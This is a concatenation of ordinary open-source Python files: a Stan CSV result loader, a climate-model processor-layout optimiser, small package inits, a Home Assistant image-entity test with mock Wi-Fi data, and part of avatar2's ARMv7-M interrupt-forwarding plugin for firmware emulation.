107a347f12b1abb4f3d7b8a380d1138f6633d26b
|
refs/heads/develop
| 2023-09-03T19:03:09.568378
| 2023-08-28T19:19:40
| 2023-08-28T19:19:40
| 163,899,458
| 135
| 75
|
BSD-3-Clause
| 2023-09-11T20:33:23
| 2019-01-02T23:18:04
|
Python
|
UTF-8
|
Python
| false
| false
| 8,659
|
py
|
__init__.py
|
"""Container objects for results of CmdStan run(s)."""
import glob
import os
from typing import Any, Dict, List, Optional, Union
from cmdstanpy.cmdstan_args import (
CmdStanArgs,
OptimizeArgs,
SamplerArgs,
VariationalArgs,
)
from cmdstanpy.utils import check_sampler_csv, get_logger, scan_config
from .gq import CmdStanGQ
from .laplace import CmdStanLaplace
from .mcmc import CmdStanMCMC
from .metadata import InferenceMetadata
from .mle import CmdStanMLE
from .runset import RunSet
from .vb import CmdStanVB
__all__ = [
"RunSet",
"InferenceMetadata",
"CmdStanMCMC",
"CmdStanMLE",
"CmdStanVB",
"CmdStanGQ",
"CmdStanLaplace",
]
def from_csv(
path: Union[str, List[str], os.PathLike, None] = None,
method: Optional[str] = None,
) -> Union[CmdStanMCMC, CmdStanMLE, CmdStanVB, None]:
"""
Instantiate a CmdStan object from a the Stan CSV files from a CmdStan run.
CSV files are specified from either a list of Stan CSV files or a single
filepath which can be either a directory name, a Stan CSV filename, or
a pathname pattern (i.e., a Python glob). The optional argument 'method'
checks that the CSV files were produced by that method.
Stan CSV files from CmdStan methods 'sample', 'optimize', and 'variational'
result in objects of class CmdStanMCMC, CmdStanMLE, and CmdStanVB,
respectively.
:param path: directory path
:param method: method name (optional)
:return: either a CmdStanMCMC, CmdStanMLE, or CmdStanVB object
"""
if path is None:
raise ValueError('Must specify path to Stan CSV files.')
if method is not None and method not in [
'sample',
'optimize',
'variational',
]:
raise ValueError(
'Bad method argument {}, must be one of: '
'"sample", "optimize", "variational"'.format(method)
)
csvfiles = []
if isinstance(path, list):
csvfiles = path
elif isinstance(path, str) and '*' in path:
splits = os.path.split(path)
if splits[0] is not None:
if not (os.path.exists(splits[0]) and os.path.isdir(splits[0])):
raise ValueError(
'Invalid path specification, {} '
' unknown directory: {}'.format(path, splits[0])
)
csvfiles = glob.glob(path)
elif isinstance(path, (str, os.PathLike)):
if os.path.exists(path) and os.path.isdir(path):
for file in os.listdir(path):
if os.path.splitext(file)[1] == ".csv":
csvfiles.append(os.path.join(path, file))
elif os.path.exists(path):
csvfiles.append(str(path))
else:
raise ValueError('Invalid path specification: {}'.format(path))
else:
raise ValueError('Invalid path specification: {}'.format(path))
if len(csvfiles) == 0:
raise ValueError('No CSV files found in directory {}'.format(path))
for file in csvfiles:
if not (os.path.exists(file) and os.path.splitext(file)[1] == ".csv"):
raise ValueError(
'Bad CSV file path spec,'
' includes non-csv file: {}'.format(file)
)
config_dict: Dict[str, Any] = {}
try:
with open(csvfiles[0], 'r') as fd:
scan_config(fd, config_dict, 0)
except (IOError, OSError, PermissionError) as e:
raise ValueError('Cannot read CSV file: {}'.format(csvfiles[0])) from e
if 'model' not in config_dict or 'method' not in config_dict:
raise ValueError("File {} is not a Stan CSV file.".format(csvfiles[0]))
if method is not None and method != config_dict['method']:
raise ValueError(
'Expecting Stan CSV output files from method {}, '
' found outputs from method {}'.format(
method, config_dict['method']
)
)
try:
if config_dict['method'] == 'sample':
chains = len(csvfiles)
sampler_args = SamplerArgs(
iter_sampling=config_dict['num_samples'],
iter_warmup=config_dict['num_warmup'],
thin=config_dict['thin'],
save_warmup=config_dict['save_warmup'],
)
# bugfix 425, check for fixed_params output
try:
check_sampler_csv(
csvfiles[0],
iter_sampling=config_dict['num_samples'],
iter_warmup=config_dict['num_warmup'],
thin=config_dict['thin'],
save_warmup=config_dict['save_warmup'],
)
except ValueError:
try:
check_sampler_csv(
csvfiles[0],
is_fixed_param=True,
iter_sampling=config_dict['num_samples'],
iter_warmup=config_dict['num_warmup'],
thin=config_dict['thin'],
save_warmup=config_dict['save_warmup'],
)
sampler_args = SamplerArgs(
iter_sampling=config_dict['num_samples'],
iter_warmup=config_dict['num_warmup'],
thin=config_dict['thin'],
save_warmup=config_dict['save_warmup'],
fixed_param=True,
)
except ValueError as e:
raise ValueError(
'Invalid or corrupt Stan CSV output file, '
) from e
cmdstan_args = CmdStanArgs(
model_name=config_dict['model'],
model_exe=config_dict['model'],
chain_ids=[x + 1 for x in range(chains)],
method_args=sampler_args,
)
runset = RunSet(args=cmdstan_args, chains=chains)
runset._csv_files = csvfiles
for i in range(len(runset._retcodes)):
runset._set_retcode(i, 0)
fit = CmdStanMCMC(runset)
fit.draws()
return fit
elif config_dict['method'] == 'optimize':
if 'algorithm' not in config_dict:
raise ValueError(
"Cannot find optimization algorithm"
" in file {}.".format(csvfiles[0])
)
optimize_args = OptimizeArgs(
algorithm=config_dict['algorithm'],
save_iterations=config_dict['save_iterations'],
jacobian=config_dict.get('jacobian', 0),
)
cmdstan_args = CmdStanArgs(
model_name=config_dict['model'],
model_exe=config_dict['model'],
chain_ids=None,
method_args=optimize_args,
)
runset = RunSet(args=cmdstan_args)
runset._csv_files = csvfiles
for i in range(len(runset._retcodes)):
runset._set_retcode(i, 0)
return CmdStanMLE(runset)
elif config_dict['method'] == 'variational':
if 'algorithm' not in config_dict:
raise ValueError(
"Cannot find variational algorithm"
" in file {}.".format(csvfiles[0])
)
variational_args = VariationalArgs(
algorithm=config_dict['algorithm'],
iter=config_dict['iter'],
grad_samples=config_dict['grad_samples'],
elbo_samples=config_dict['elbo_samples'],
eta=config_dict['eta'],
tol_rel_obj=config_dict['tol_rel_obj'],
eval_elbo=config_dict['eval_elbo'],
output_samples=config_dict['output_samples'],
)
cmdstan_args = CmdStanArgs(
model_name=config_dict['model'],
model_exe=config_dict['model'],
chain_ids=None,
method_args=variational_args,
)
runset = RunSet(args=cmdstan_args)
runset._csv_files = csvfiles
for i in range(len(runset._retcodes)):
runset._set_retcode(i, 0)
return CmdStanVB(runset)
else:
get_logger().info(
'Unable to process CSV output files from method %s.',
(config_dict['method']),
)
return None
except (IOError, OSError, PermissionError) as e:
raise ValueError(
'An error occurred processing the CSV files:\n\t{}'.format(str(e))
) from e
|
65244afbc0358152f637fa7e65e0b0e0d50b0394
|
045ec3ae16fc554a05510abc3697557ebc5ce304
|
/tools/load_balancing_tool/layouts.py
|
7b4e0b32d790c5f69c5940f201f24db8a9f3b428
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
ESMCI/cime
|
c09223ee9b8a463bd00741ff39f60fda7639af89
|
02fad90a379cdbd3c1106cbd63324480f0bf7a22
|
refs/heads/master
| 2023-08-16T07:03:22.224344
| 2023-08-03T19:47:53
| 2023-08-03T19:47:53
| 31,605,662
| 159
| 179
|
NOASSERTION
| 2023-09-12T18:38:42
| 2015-03-03T15:33:00
|
Python
|
UTF-8
|
Python
| false
| false
| 15,250
|
py
|
layouts.py
|
import optimize_model
import pulp
class IceLndAtmOcn(optimize_model.OptimizeModel):
"""
Optimized the problem based on the Layout
____________________
| ICE | LND | |
|______|_______| |
| | OCN |
| ATM | |
|______________|_____|
Min T
s.t. T[ice] <= T1
T[lnd] <= T1
T1 + T[atm] <= T
T[ocn] <= T
NB[c] >= 1 for c in [ice,lnd,ocn,atm]
NB[ice] + NB[lnd] <= NB[atm]
atm_blocksize*NB[atm] + ocn_blocksize*NB[ocn] <= TotalTasks
(NB[*] is number of processor blocks)
T[c] >= C[c]_{i} - NB[c]_{i} *
(C[c]_{i+1} - C[c]_{i}) / (NB[c]_{i+1} - NB[c]_{i})
+ NB[c] * (C[c]_{i+1} - C[c]_{i})
/ (NB[c]_{i+1} - NB[c]_{i}),
i=1..ord(NB), c in [ice,lnd,ocn,atm]
These assumptions are checked when solver is initialized
. Assuming cost is monotonic decreasing vs ntasks
. Assuming perfect scalability for ntasks < tasks[0]
. Assuming same scalability factor for ntasks > ntasks[last] as for
last two data points
Returns state (STATE_SOLVED_OK, STATE_SOLVED_BAD, STATE_UNSOLVED)
If solved, then solution will be stored in self.X dictionary, indexed
by variable name. Suggested convention:
'Tice', 'Tlnd', ... for cost per component
'Nice', 'Nlnd', ... for ntasks per component
'NBice', 'NBlnd', ... for number of blocks per component
"""
def get_required_components(self):
return ["LND", "ICE", "ATM", "OCN"]
def optimize(self):
"""
Run the optimization.
set solution in self.X
set state STATE_SOLVED_OK if solved,
otherwise STATE_SOLVED_BAD
"""
assert (
self.state != self.STATE_UNDEFINED
), "set_data() must be called before optimize()!"
self.atm = self.models["ATM"]
self.lnd = self.models["LND"]
self.ice = self.models["ICE"]
self.ocn = self.models["OCN"]
self.real_variables = ["TotalTime", "T1", "Tice", "Tlnd", "Tatm", "Tocn"]
self.integer_variables = [
"NBice",
"NBlnd",
"NBatm",
"NBocn",
"Nice",
"Nlnd",
"Natm",
"Nocn",
]
self.X = {}
X = self.X
self.prob = pulp.LpProblem("Minimize ACME time cost", pulp.LpMinimize)
for rv in self.real_variables:
X[rv] = pulp.LpVariable(rv, lowBound=0)
for iv in self.integer_variables:
X[iv] = pulp.LpVariable(iv, lowBound=1, cat=pulp.LpInteger)
# cost function
self.prob += X["TotalTime"]
# constraints
self.constraints = []
# Layout-dependent constraints. Choosing another layout to model
# will require editing these constraints
self.constraints.append([X["Tice"] - X["T1"] <= 0, "Tice - T1 == 0"])
self.constraints.append([X["Tlnd"] - X["T1"] <= 0, "Tlnd - T1 == 0"])
self.constraints.append(
[X["T1"] + X["Tatm"] - X["TotalTime"] <= 0, "T1 + Tatm - TotalTime <= 0"]
)
self.constraints.append(
[X["Tocn"] - X["TotalTime"] <= 0, "Tocn - TotalTime == 0"]
)
self.constraints.append(
[X["Nice"] + X["Nlnd"] - X["Natm"] == 0, "Nice + Nlnd - Natm == 0"]
)
self.constraints.append(
[
X["Natm"] + X["Nocn"] == self.maxtasks,
"Natm + Nocn <= %d" % (self.maxtasks),
]
)
self.constraints.append(
[
self.atm.blocksize * X["NBatm"] - X["Natm"] == 0,
"Natm = %d * NBatm" % self.atm.blocksize,
]
)
self.constraints.append(
[
self.ice.blocksize * X["NBice"] - X["Nice"] == 0,
"Nice = %d * NBice" % self.ice.blocksize,
]
)
self.constraints.append(
[
self.lnd.blocksize * X["NBlnd"] - X["Nlnd"] == 0,
"Nlnd = %d * NBlnd" % self.lnd.blocksize,
]
)
self.constraints.append(
[
self.ocn.blocksize * X["NBocn"] - X["Nocn"] == 0,
"Nocn = %d * NBocn" % self.ocn.blocksize,
]
)
# These are the constraints based on the timing data.
# They should be the same no matter what the layout of the components.
self.add_model_constraints()
for c, s in self.constraints:
self.prob += c, s
# Write the program to file and solve (using coin-cbc)
self.prob.writeLP("IceLndAtmOcn_model.lp")
self.prob.solve()
self.set_state(self.prob.status)
return self.state
def get_solution(self):
"""
Return a dictionary of the solution variables.
"""
assert (
self.state == self.STATE_SOLVED_OK
), "solver failed, no solution available"
return {
"NBLOCKS_ICE": self.X["NBice"].varValue,
"NBLOCKS_LND": self.X["NBlnd"].varValue,
"NBLOCKS_ATM": self.X["NBatm"].varValue,
"NBLOCKS_OCN": self.X["NBocn"].varValue,
"NTASKS_ICE": self.X["Nice"].varValue,
"NTASKS_LND": self.X["Nlnd"].varValue,
"NTASKS_ATM": self.X["Natm"].varValue,
"NTASKS_OCN": self.X["Nocn"].varValue,
"NTASKS_TOTAL": self.maxtasks,
"COST_ICE": self.X["Tice"].varValue,
"COST_LND": self.X["Tlnd"].varValue,
"COST_ATM": self.X["Tatm"].varValue,
"COST_OCN": self.X["Tocn"].varValue,
"COST_TOTAL": self.X["TotalTime"].varValue,
}
def write_pe_file(self, pefilename):
"""
Write out a pe_file that can be used to implement the
optimized layout
"""
assert (
self.state == self.STATE_SOLVED_OK
), "solver failed, no solution available"
natm = int(self.X["Natm"].varValue)
nlnd = int(self.X["Nlnd"].varValue)
nice = int(self.X["Nice"].varValue)
nocn = int(self.X["Nocn"].varValue)
ntasks = {
"atm": natm,
"lnd": nlnd,
"rof": 1,
"ice": nice,
"ocn": nocn,
"glc": 1,
"wav": 1,
"cpl": 1,
}
roots = {
"atm": 0,
"lnd": nice,
"rof": 0,
"ice": 0,
"ocn": natm,
"glc": 0,
"wav": 0,
"cpl": 0,
}
nthrds = {}
for c in ["atm", "lnd", "rof", "ice", "ocn", "glc", "wav", "cpl"]:
if c.upper() in self.models:
nthrds[c] = self.models[c.upper()].nthrds
else:
nthrds[c] = 1
self.write_pe_template(pefilename, ntasks, nthrds, roots)
class IceLndWavAtmOcn(optimize_model.OptimizeModel):
"""
Optimized the problem based on the Layout
__________________________
| ICE | LND | WAV | |
|______|_______|_____| |
| | OCN |
| ATM | |
|____________________|_____|
Min T
s.t. T[ice] <= T1
T[lnd] <= T1
T[wav] <= T1
T1 + T[atm] <= T
T[ocn] <= T
NB[c] >= 1 for c in [ice,lnd,wav,ocn,atm]
NB[ice] + NB[lnd] + NB[wav] <= NB[atm]
atm_blocksize*NB[atm] + ocn_blocksize*NB[ocn] <= TotalTasks
(NB[*] is number of processor blocks)
T[c] >= C[c]_{i} - NB[c]_{i} *
(C[c]_{i+1} - C[c]_{i}) / (NB[c]_{i+1} - NB[c]_{i})
+ NB[c] * (C[c]_{i+1} - C[c]_{i})
/ (NB[c]_{i+1} - NB[c]_{i}),
i=1..ord(NB), c in [ice,lnd,wav,ocn,atm]
These assumptions are checked when solver is initialized
. Assuming cost is monotonic decreasing vs ntasks
. Assuming perfect scalability for ntasks < tasks[0]
. Assuming same scalability factor for ntasks > ntasks[last] as for
last two data points
. Assuming components are capable of running on ntasks
Returns state (STATE_SOLVED_OK, STATE_SOLVED_BAD, STATE_UNSOLVED)
If solved, then solution will be stored in self.X dictionary, indexed
by variable name. Suggested convention:
'Tice', 'Tlnd', ... for cost per component
'Nice', 'Nlnd', ... for ntasks per component
'NBice', 'NBlnd', ... for number of blocks per component
"""
def __init__(self):
self.models = {}
def get_required_components(self):
return ["LND", "ICE", "WAV", "ATM", "OCN"]
def optimize(self):
"""
Run the optimization.
set solution in self.X
set state STATE_SOLVED_OK if solved,
otherwise STATE_SOLVED_BAD
"""
assert (
self.state != self.STATE_UNDEFINED
), "set_data() must be called before optimize()!"
self.atm = self.models["ATM"]
self.lnd = self.models["LND"]
self.ice = self.models["ICE"]
self.ocn = self.models["OCN"]
self.wav = self.models["WAV"]
self.real_variables = [
"TotalTime",
"T1",
"Tice",
"Tlnd",
"Tatm",
"Tocn",
"Twav",
]
self.integer_variables = [
"NBice",
"NBlnd",
"NBatm",
"NBocn",
"NBwav",
"Nice",
"Nlnd",
"Natm",
"Nocn",
"Nwav",
]
self.X = {}
X = self.X
self.prob = pulp.LpProblem("Minimize ACME time cost", pulp.LpMinimize)
for rv in self.real_variables:
X[rv] = pulp.LpVariable(rv, lowBound=0)
for iv in self.integer_variables:
X[iv] = pulp.LpVariable(iv, lowBound=1, cat=pulp.LpInteger)
# cost function
self.prob += X["TotalTime"]
# constraints
self.constraints = []
# Layout-dependent constraints. Choosing another layout to model
# will require editing these constraints
self.constraints.append([X["Tice"] - X["T1"] <= 0, "Tice - T1 == 0"])
self.constraints.append([X["Tlnd"] - X["T1"] <= 0, "Tlnd - T1 == 0"])
self.constraints.append([X["Twav"] - X["T1"] <= 0, "Twav - T1 == 0"])
self.constraints.append(
[X["T1"] + X["Tatm"] - X["TotalTime"] <= 0, "T1 + Tatm - TotalTime <= 0"]
)
self.constraints.append(
[X["Tocn"] - X["TotalTime"] <= 0, "Tocn - TotalTime == 0"]
)
self.constraints.append(
[
X["Nice"] + X["Nlnd"] + X["Nwav"] - X["Natm"] == 0,
"Nice + Nlnd + Nwav - Natm == 0",
]
)
self.constraints.append(
[
X["Natm"] + X["Nocn"] == self.maxtasks,
"Natm + Nocn <= %d" % (self.maxtasks),
]
)
self.constraints.append(
[
self.atm.blocksize * X["NBatm"] - X["Natm"] == 0,
"Natm = %d * NBatm" % self.atm.blocksize,
]
)
self.constraints.append(
[
self.ice.blocksize * X["NBice"] - X["Nice"] == 0,
"Nice = %d * NBice" % self.ice.blocksize,
]
)
self.constraints.append(
[
self.lnd.blocksize * X["NBlnd"] - X["Nlnd"] == 0,
"Nlnd = %d * NBlnd" % self.lnd.blocksize,
]
)
self.constraints.append(
[
self.ocn.blocksize * X["NBocn"] - X["Nocn"] == 0,
"Nocn = %d * NBocn" % self.ocn.blocksize,
]
)
self.constraints.append(
[
self.wav.blocksize * X["NBwav"] - X["Nwav"] == 0,
"Nwav = %d * NBwav" % self.wav.blocksize,
]
)
# These are the constraints based on the timing data.
# They should be the same no matter what the layout of the components.
self.add_model_constraints()
for c, s in self.constraints:
self.prob += c, s
# Write the program to file and solve (using coin-cbc)
self.prob.writeLP("IceLndWavAtmOcn_model.lp")
self.prob.solve()
self.set_state(self.prob.status)
return self.state
def get_solution(self):
"""
Return a dictionary of the solution variables.
"""
assert (
self.state == self.STATE_SOLVED_OK
), "solver failed, no solution available"
return {
"NBLOCKS_ICE": self.X["NBice"].varValue,
"NBLOCKS_LND": self.X["NBlnd"].varValue,
"NBLOCKS_WAV": self.X["NBwav"].varValue,
"NBLOCKS_ATM": self.X["NBatm"].varValue,
"NBLOCKS_OCN": self.X["NBocn"].varValue,
"NTASKS_ICE": self.X["Nice"].varValue,
"NTASKS_LND": self.X["Nlnd"].varValue,
"NTASKS_WAV": self.X["Nwav"].varValue,
"NTASKS_ATM": self.X["Natm"].varValue,
"NTASKS_OCN": self.X["Nocn"].varValue,
"NTASKS_TOTAL": self.maxtasks,
"COST_ICE": self.X["Tice"].varValue,
"COST_LND": self.X["Tlnd"].varValue,
"COST_WAV": self.X["Twav"].varValue,
"COST_ATM": self.X["Tatm"].varValue,
"COST_OCN": self.X["Tocn"].varValue,
"COST_TOTAL": self.X["TotalTime"].varValue,
}
def write_pe_file(self, pefilename):
"""
Write out a pe_file that can be used to implement the
optimized layout
"""
assert (
self.state == self.STATE_SOLVED_OK
), "solver failed, no solution available"
natm = int(self.X["Natm"].varValue)
nlnd = int(self.X["Nlnd"].varValue)
nice = int(self.X["Nice"].varValue)
nocn = int(self.X["Nocn"].varValue)
nwav = int(self.X["Nwav"].varValue)
ntasks = {
"atm": natm,
"lnd": nlnd,
"rof": 1,
"ice": nice,
"ocn": nocn,
"glc": 1,
"wav": nwav,
"cpl": 1,
}
roots = {
"atm": 0,
"lnd": 0,
"rof": 0,
"ice": nlnd,
"ocn": natm,
"glc": 0,
"wav": nlnd + nice,
"cpl": 0,
}
nthrds = {}
for c in ["atm", "lnd", "rof", "ice", "ocn", "glc", "wav", "cpl"]:
if c.upper() in self.models:
nthrds[c] = self.models[c.upper()].nthrds
else:
nthrds[c] = 1
self.write_pe_template(pefilename, ntasks, nthrds, roots)
|
334973f8dd925830870712b1d74f843d12e53f7d
|
f8a2dfa9f6f1fec00863ab054b3874e71374c605
|
/urduhack/pipeline/__init__.py
|
1c06981152e9896b6c97afbca925dbc93f26fadc
|
[
"MIT"
] |
permissive
|
urduhack/urduhack
|
eff6164c1e1135963b44b8b75ab75a7239d6ffd0
|
f7f0aa26ef516ce7907429dff0863577190beca7
|
refs/heads/master
| 2023-05-10T19:25:25.761716
| 2023-04-27T07:01:48
| 2023-04-27T07:01:48
| 163,254,580
| 285
| 44
|
MIT
| 2023-04-27T07:01:49
| 2018-12-27T06:11:05
|
Python
|
UTF-8
|
Python
| false
| false
| 65
|
py
|
__init__.py
|
# coding: utf8
"""Pipeline module"""
from .core import Pipeline
|
48cc6d25492ab36554a234abc67a26c5f5ca0e05
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/tests/components/fritz/test_image.py
|
cbcbded56920af84d57e85006973f2f36482b672
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 5,499
|
py
|
test_image.py
|
"""Tests for Fritz!Tools image platform."""
from datetime import timedelta
from http import HTTPStatus
from unittest.mock import patch
import pytest
from syrupy.assertion import SnapshotAssertion
from homeassistant.components.fritz.const import DOMAIN
from homeassistant.components.image import DOMAIN as IMAGE_DOMAIN
from homeassistant.config_entries import ConfigEntryState
from homeassistant.const import Platform
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_registry import async_get as async_get_entity_registry
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from .const import MOCK_FB_SERVICES, MOCK_USER_DATA
from tests.common import MockConfigEntry, async_fire_time_changed
from tests.typing import ClientSessionGenerator
GUEST_WIFI_ENABLED: dict[str, dict] = {
"WLANConfiguration0": {},
"WLANConfiguration1": {
"GetInfo": {
"NewEnable": True,
"NewStatus": "Up",
"NewSSID": "GuestWifi",
"NewBeaconType": "11iandWPA3",
"NewX_AVM-DE_PossibleBeaconTypes": "None,11i,11iandWPA3",
"NewStandard": "ax",
"NewBSSID": "1C:ED:6F:12:34:13",
},
"GetSSID": {
"NewSSID": "GuestWifi",
},
"GetSecurityKeys": {"NewKeyPassphrase": "1234567890"},
},
}
GUEST_WIFI_CHANGED: dict[str, dict] = {
"WLANConfiguration0": {},
"WLANConfiguration1": {
"GetInfo": {
"NewEnable": True,
"NewStatus": "Up",
"NewSSID": "GuestWifi",
"NewBeaconType": "11iandWPA3",
"NewX_AVM-DE_PossibleBeaconTypes": "None,11i,11iandWPA3",
"NewStandard": "ax",
"NewBSSID": "1C:ED:6F:12:34:13",
},
"GetSSID": {
"NewSSID": "GuestWifi",
},
"GetSecurityKeys": {"NewKeyPassphrase": "abcdefghij"},
},
}
GUEST_WIFI_DISABLED: dict[str, dict] = {
"WLANConfiguration0": {},
"WLANConfiguration1": {
"GetInfo": {
"NewEnable": False,
"NewStatus": "Up",
"NewSSID": "GuestWifi",
"NewBeaconType": "11iandWPA3",
"NewX_AVM-DE_PossibleBeaconTypes": "None,11i,11iandWPA3",
"NewStandard": "ax",
"NewBSSID": "1C:ED:6F:12:34:13",
},
"GetSSID": {
"NewSSID": "GuestWifi",
},
"GetSecurityKeys": {"NewKeyPassphrase": "1234567890"},
},
}
@pytest.mark.parametrize(
("fc_data"),
[
({**MOCK_FB_SERVICES, **GUEST_WIFI_ENABLED}),
({**MOCK_FB_SERVICES, **GUEST_WIFI_DISABLED}),
],
)
async def test_image_entity(
hass: HomeAssistant,
hass_client: ClientSessionGenerator,
snapshot: SnapshotAssertion,
fc_class_mock,
fh_class_mock,
) -> None:
"""Test image entity."""
# setup component with image platform only
with patch(
"homeassistant.components.fritz.PLATFORMS",
[Platform.IMAGE],
):
entry = MockConfigEntry(domain=DOMAIN, data=MOCK_USER_DATA)
entry.add_to_hass(hass)
assert await async_setup_component(hass, DOMAIN, {})
await hass.async_block_till_done()
assert entry.state == ConfigEntryState.LOADED
# test image entity is generated as expected
states = hass.states.async_all(IMAGE_DOMAIN)
assert len(states) == 1
state = states[0]
assert state.name == "Mock Title GuestWifi"
assert state.entity_id == "image.mock_title_guestwifi"
access_token = state.attributes["access_token"]
assert state.attributes == {
"access_token": access_token,
"entity_picture": f"/api/image_proxy/image.mock_title_guestwifi?token={access_token}",
"friendly_name": "Mock Title GuestWifi",
}
entity_registry = async_get_entity_registry(hass)
entity_entry = entity_registry.async_get("image.mock_title_guestwifi")
assert entity_entry.unique_id == "1c_ed_6f_12_34_11_guestwifi_qr_code"
# test image download
client = await hass_client()
resp = await client.get("/api/image_proxy/image.mock_title_guestwifi")
assert resp.status == HTTPStatus.OK
body = await resp.read()
assert body == snapshot
@pytest.mark.parametrize(("fc_data"), [({**MOCK_FB_SERVICES, **GUEST_WIFI_ENABLED})])
async def test_image_update(
hass: HomeAssistant,
hass_client: ClientSessionGenerator,
snapshot: SnapshotAssertion,
fc_class_mock,
fh_class_mock,
) -> None:
"""Test image update."""
# setup component with image platform only
with patch(
"homeassistant.components.fritz.PLATFORMS",
[Platform.IMAGE],
):
entry = MockConfigEntry(domain=DOMAIN, data=MOCK_USER_DATA)
entry.add_to_hass(hass)
assert await async_setup_component(hass, DOMAIN, {})
await hass.async_block_till_done()
assert entry.state == ConfigEntryState.LOADED
client = await hass_client()
resp = await client.get("/api/image_proxy/image.mock_title_guestwifi")
resp_body = await resp.read()
assert resp.status == HTTPStatus.OK
fc_class_mock().override_services({**MOCK_FB_SERVICES, **GUEST_WIFI_CHANGED})
async_fire_time_changed(hass, utcnow() + timedelta(seconds=60))
await hass.async_block_till_done()
resp = await client.get("/api/image_proxy/image.mock_title_guestwifi")
resp_body_new = await resp.read()
assert resp_body != resp_body_new
assert resp_body_new == snapshot
|
8a478cc09afbff9c3d89c382988ae8954d4368bd
|
3f763cf893b09a3be562858613c928703ff349e4
|
/client/verta/verta/_vendored/__init__.py
|
04fbc04b03fc25a9e6bcc83ba933105501e593c4
|
[
"Apache-2.0"
] |
permissive
|
VertaAI/modeldb
|
636e46fc025b01a514d599b10e228c8735503357
|
ec9ac7712500adb13fd815dfd476ce9f536c6921
|
refs/heads/main
| 2023-08-31T00:45:37.220628
| 2023-08-30T18:45:13
| 2023-08-30T18:45:13
| 71,305,435
| 844
| 142
|
Apache-2.0
| 2023-09-14T19:24:13
| 2016-10-19T01:07:26
|
Java
|
UTF-8
|
Python
| false
| false
| 77
|
py
|
__init__.py
|
"""
.. versionchanged:: 0.24.0
Moved here from ``verta.external``.
"""
|
2da91d7df0532ed56c51c406dfa9d2ad54db7330
|
35ffbadf2f410ba8a195271af28ee2804121661f
|
/avatar2/plugins/arm/armv7m_interrupts.py
|
2ed860f2d28be6042e6f0a370678317605387866
|
[
"Apache-2.0"
] |
permissive
|
avatartwo/avatar2
|
08799f13fd416c24eef374333e87eaa831573f60
|
a2d06c9313db55f11a10579c8a45d05b025fa9ea
|
refs/heads/main
| 2023-08-29T21:17:23.962466
| 2023-03-21T16:33:07
| 2023-03-21T16:33:07
| 94,234,201
| 498
| 118
|
Apache-2.0
| 2023-03-21T16:33:09
| 2017-06-13T16:31:51
|
Python
|
UTF-8
|
Python
| false
| false
| 7,402
|
py
|
armv7m_interrupts.py
|
from types import MethodType
from threading import Thread, Event, Condition
from avatar2 import TargetStates
from avatar2.archs import ARMV7M
from avatar2.protocols.coresight import CoreSightProtocol
from avatar2.protocols.armv7m_interrupt import ARMV7MInterruptProtocol
from avatar2.targets import OpenOCDTarget, QemuTarget
from avatar2.watchmen import AFTER
from avatar2.message import RemoteInterruptEnterMessage
from avatar2.message import RemoteInterruptExitMessage
from avatar2.message import RemoteMemoryWriteMessage
from avatar2.message import BreakpointHitMessage
from avatar2.watchmen import watch
def add_protocols(self, **kwargs):
target = kwargs['watched_target']
if isinstance(target, OpenOCDTarget):
target.protocols.interrupts = CoreSightProtocol(target.avatar,
target)
# We want to remove the decorators around the read_memory function of
# this target, to allow reading while it is running (thanks oocd)
target.read_memory = MethodType( lambda t, *args, **kwargs:
t.protocols.memory.read_memory(
*args, **kwargs), target
)
# Also, let's use openocd as protocol for register and memory
target.protocols.memory = target.protocols.monitor
target.protocols.register = target.protocols.monitor
if isinstance(target, QemuTarget):
target.protocols.interrupts = ARMV7MInterruptProtocol(
target, self.v7m_irq_rx_queue_name, self.v7m_irq_tx_queue_name
)
def forward_interrupt(self, message): # , **kwargs):
global stawp
target = message.origin
target.update_state(message.state)
self.queue.put(message)
if isinstance(target, OpenOCDTarget):
if message.address == message.origin.protocols.interrupts._monitor_stub_isr - 1:
xpsr = target.read_register('xPSR')
irq_num = xpsr & 0xff
self.log.info("Injecting IRQ 0x%x" % irq_num)
self._irq_dst.protocols.interrupts.inject_interrupt(irq_num)
def gontinue_execution(self, message, **kwargs):
target = message.origin
if message.address == message.origin.protocols.interrupts._monitor_stub_isr - 1:
target.cont()
def enable_interrupt_forwarding(self, from_target, to_target=None,
disabled_irqs=None, semi_forwarding=False):
"""
Semi forwarding is a special mode developed for pretender.
It allows that irqs are taken from from_target and external calls to
inject_interrupt. However, no information about to_targets irq-state is
given back to from_target. Nevertheless, memory requests from to_target to
from_target are forwarded.
Confused yet? So are we, this is a huge hack.
"""
self._irq_src = from_target
self._irq_dst = to_target
self._irq_semi_forwarding = semi_forwarding
self._irq_ignore = [] if disabled_irqs is None else disabled_irqs
self._handle_remote_interrupt_enter_message = MethodType(
_handle_remote_interrupt_enter_message, self)
self._handle_remote_interrupt_exit_message = MethodType(
_handle_remote_interrupt_exit_message, self)
self._handle_remote_memory_write_message_nvic = MethodType(
_handle_remote_memory_write_message_nvic, self)
self.message_handlers.update(
{
RemoteInterruptEnterMessage: self._handle_remote_interrupt_enter_message,
RemoteInterruptExitMessage: self._handle_remote_interrupt_exit_message}
)
self.message_handlers.update(
{
RemoteMemoryWriteMessage: self._handle_remote_memory_write_message_nvic}
)
if from_target:
from_target.protocols.interrupts.enable_interrupts()
isr_addr = from_target.protocols.interrupts._monitor_stub_isr - 1
self.log.info("ISR breakpoint at %#08x" % isr_addr)
from_target.set_breakpoint(isr_addr, hardware=True)
if to_target:
to_target.protocols.interrupts.enable_interrupts()
# OpenOCDProtocol does not emit breakpointhitmessages currently,
# So we listen on state-updates and figure out the rest on our own
# self.watchmen.add_watchman('BreakpointHit', when=AFTER,
# callback=continue_execution)
self._handle_breakpoint_handler = MethodType(forward_interrupt, self)
self.fast_queue_listener.message_handlers.update({
BreakpointHitMessage: self._handle_breakpoint_handler
}
)
# def _fast_handle_update_state_message(self, message):
# print message
# message.origin.update_state(message.state)
# self.avatar.queue.put(message)
@watch('RemoteInterruptEnter')
